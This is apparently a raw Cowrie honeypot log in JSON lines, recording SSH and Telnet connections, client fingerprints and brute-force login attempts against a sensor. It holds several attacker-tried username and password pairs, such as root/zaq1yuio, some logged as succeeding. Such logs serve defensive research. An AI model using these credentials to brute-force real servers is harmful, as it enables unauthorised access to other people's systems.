{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:49.772732Z","src_ip":"49.247.35.31","session":"f94c78319206"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":44130,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec951a7a6c3d","protocol":"ssh","message":"New connection: 134.199.174.250:44130 (1.2.3.4:22) [session: ec951a7a6c3d]","sensor":"my-vps","timestamp":"2025-09-08T13:30:49.948275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:30:49.949488Z","src_ip":"134.199.174.250","session":"ec951a7a6c3d"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":26006,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ab42f22aab2","protocol":"ssh","message":"New connection: 49.247.35.31:26006 (1.2.3.4:22) [session: 7ab42f22aab2]","sensor":"my-vps","timestamp":"2025-09-08T13:30:50.068838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:30:50.078159Z","src_ip":"49.247.35.31","session":"7ab42f22aab2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:30:50.320778Z","src_ip":"134.199.174.250","session":"ec951a7a6c3d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:30:50.385333Z","src_ip":"49.247.35.31","session":"7ab42f22aab2"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"1234567890","message":"login attempt [administrator/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:30:51.588953Z","src_ip":"134.199.174.250","session":"ec951a7a6c3d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:30:51.662927Z","src_ip":"49.247.35.31","session":"7ab42f22aab2"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:52.981096Z","src_ip":"49.247.35.31","session":"7ab42f22aab2"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:52.982388Z","src_ip":"134.199.174.250","session":"ec951a7a6c3d"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":39283,"dst_ip":"1.2.3.4","dst_port":22,"session":"77f5c917ae19","protocol":"ssh","message":"New connection: 49.247.35.31:39283 (1.2.3.4:22) [session: 77f5c917ae19]","sensor":"my-vps","timestamp":"2025-09-08T13:30:53.318283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:30:53.337061Z","src_ip":"49.247.35.31","session":"77f5c917ae19"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:30:53.619437Z","src_ip":"49.247.35.31","session":"77f5c917ae19"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:30:54.776899Z","src_ip":"49.247.35.31","session":"77f5c917ae19"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:55.076092Z","src_ip":"49.247.35.31","session":"f94c78319206"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:55.076950Z","src_ip":"49.247.35.31","session":"77f5c917ae19"}
{"eventid":"cowrie.session.closed","duration":12.670925855636597,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:55.931594Z","src_ip":"212.227.125.160","session":"70f32f4f5609"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20558,"dst_ip":"1.2.3.4","dst_port":23,"session":"02cad6039d6f","protocol":"telnet","message":"New connection: 212.227.125.160:20558 (1.2.3.4:23) [session: 02cad6039d6f]","sensor":"my-vps","timestamp":"2025-09-08T13:30:56.146848Z"}
{"eventid":"cowrie.session.closed","duration":12.598797082901001,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:59.140227Z","src_ip":"212.227.235.229","session":"d311f6bbf687"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16577,"dst_ip":"1.2.3.4","dst_port":23,"session":"4ad4129ad22a","protocol":"telnet","message":"New connection: 212.227.235.229:16577 (1.2.3.4:23) [session: 4ad4129ad22a]","sensor":"my-vps","timestamp":"2025-09-08T13:30:59.512627Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:59.600945Z","src_ip":"212.227.125.160","session":"0340d3900859"}
{"eventid":"cowrie.session.closed","duration":12.714939594268799,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:00.673273Z","src_ip":"212.227.235.229","session":"15ba12d2e142"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57782,"dst_ip":"1.2.3.4","dst_port":23,"session":"e88c8fe34912","protocol":"telnet","message":"New connection: 212.227.235.229:57782 (1.2.3.4:23) [session: e88c8fe34912]","sensor":"my-vps","timestamp":"2025-09-08T13:31:00.921324Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48100,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1c17ab90be7","protocol":"ssh","message":"New connection: 212.227.235.229:48100 (1.2.3.4:22) [session: a1c17ab90be7]","sensor":"my-vps","timestamp":"2025-09-08T13:31:03.904473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:31:03.906060Z","src_ip":"212.227.235.229","session":"a1c17ab90be7"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-09-08T13:31:04.007249Z","src_ip":"212.227.235.229","session":"a1c17ab90be7"}
{"eventid":"cowrie.login.success","username":"root","password":"zaq1yuio","message":"login attempt [root/zaq1yuio] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:31:04.315856Z","src_ip":"212.227.235.229","session":"a1c17ab90be7"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:04.420407Z","src_ip":"212.227.235.229","session":"a1c17ab90be7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33678,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a9620b3cbdd","protocol":"ssh","message":"New connection: 212.227.235.229:33678 (1.2.3.4:22) [session: 0a9620b3cbdd]","sensor":"my-vps","timestamp":"2025-09-08T13:31:04.538774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:31:04.539620Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-08T13:31:04.650090Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
{"eventid":"cowrie.login.success","username":"root","password":"zaq1yuio","message":"login attempt [root/zaq1yuio] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:31:04.978429Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49944,"dst_ip":"1.2.3.4","dst_port":22,"session":"705d83588224","protocol":"ssh","message":"New connection: 212.227.235.229:49944 (1.2.3.4:22) [session: 705d83588224]","sensor":"my-vps","timestamp":"2025-09-08T13:31:08.661769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:31:08.662396Z","src_ip":"212.227.235.229","session":"705d83588224"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:31:08.775142Z","src_ip":"212.227.235.229","session":"705d83588224"}
{"eventid":"cowrie.session.closed","duration":12.77120065689087,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:08.917980Z","src_ip":"212.227.125.160","session":"02cad6039d6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21955,"dst_ip":"1.2.3.4","dst_port":23,"session":"d291fe0fb7c5","protocol":"telnet","message":"New connection: 212.227.125.160:21955 (1.2.3.4:23) [session: d291fe0fb7c5]","sensor":"my-vps","timestamp":"2025-09-08T13:31:09.153099Z"}
{"eventid":"cowrie.login.failed","username":"amit","password":"amit2025","message":"login attempt [amit/amit2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:31:09.254379Z","src_ip":"212.227.235.229","session":"705d83588224"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:10.361255Z","src_ip":"212.227.235.229","session":"705d83588224"}
{"eventid":"cowrie.session.closed","duration":12.619438648223877,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:12.131997Z","src_ip":"212.227.235.229","session":"4ad4129ad22a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10942,"dst_ip":"1.2.3.4","dst_port":23,"session":"976ce771e316","protocol":"telnet","message":"New connection: 212.227.235.229:10942 (1.2.3.4:23) [session: 976ce771e316]","sensor":"my-vps","timestamp":"2025-09-08T13:31:12.400699Z"}
{"eventid":"cowrie.session.closed","duration":12.772944450378418,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:13.694206Z","src_ip":"212.227.235.229","session":"e88c8fe34912"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58126,"dst_ip":"1.2.3.4","dst_port":23,"session":"bd5b06addebd","protocol":"telnet","message":"New connection: 212.227.235.229:58126 (1.2.3.4:23) [session: bd5b06addebd]","sensor":"my-vps","timestamp":"2025-09-08T13:31:13.931688Z"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":52834,"dst_ip":"1.2.3.4","dst_port":22,"session":"66e44814e93f","protocol":"ssh","message":"New connection: 134.199.174.250:52834 (1.2.3.4:22) [session: 66e44814e93f]","sensor":"my-vps","timestamp":"2025-09-08T13:31:20.883018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:31:20.884133Z","src_ip":"134.199.174.250","session":"66e44814e93f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:31:21.206915Z","src_ip":"134.199.174.250","session":"66e44814e93f"}
{"eventid":"cowrie.session.closed","duration":12.765202283859253,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:21.918252Z","src_ip":"212.227.125.160","session":"d291fe0fb7c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23356,"dst_ip":"1.2.3.4","dst_port":23,"session":"477cafd71ce0","protocol":"telnet","message":"New connection: 212.227.125.160:23356 (1.2.3.4:23) [session: 477cafd71ce0]","sensor":"my-vps","timestamp":"2025-09-08T13:31:22.154722Z"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"password1","message":"login attempt [administrator/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:31:22.350428Z","src_ip":"134.199.174.250","session":"66e44814e93f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55578,"dst_ip":"1.2.3.4","dst_port":22,"session":"31d92d6b50aa","protocol":"ssh","message":"New connection: 212.227.235.229:55578 (1.2.3.4:22) [session: 31d92d6b50aa]","sensor":"my-vps","timestamp":"2025-09-08T13:31:22.734608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:31:22.735399Z","src_ip":"212.227.235.229","session":"31d92d6b50aa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:31:22.854844Z","src_ip":"212.227.235.229","session":"31d92d6b50aa"}
{"eventid":"cowrie.login.failed","username":"vladimir","password":"Password1","message":"login attempt [vladimir/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:31:23.373121Z","src_ip":"212.227.235.229","session":"31d92d6b50aa"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:23.740967Z","src_ip":"134.199.174.250","session":"66e44814e93f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:24.493706Z","src_ip":"212.227.235.229","session":"31d92d6b50aa"}
{"eventid":"cowrie.session.closed","duration":12.703701257705688,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:25.104329Z","src_ip":"212.227.235.229","session":"976ce771e316"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":12860,"dst_ip":"1.2.3.4","dst_port":23,"session":"6d22a8d4ac23","protocol":"telnet","message":"New connection: 212.227.235.229:12860 (1.2.3.4:23) [session: 6d22a8d4ac23]","sensor":"my-vps","timestamp":"2025-09-08T13:31:25.449653Z"}
{"eventid":"cowrie.session.closed","duration":12.747742176055908,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:26.679365Z","src_ip":"212.227.235.229","session":"bd5b06addebd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58450,"dst_ip":"1.2.3.4","dst_port":23,"session":"fc0e4753886e","protocol":"telnet","message":"New connection: 212.227.235.229:58450 (1.2.3.4:23) [session: fc0e4753886e]","sensor":"my-vps","timestamp":"2025-09-08T13:31:26.918877Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:31:28.611052Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
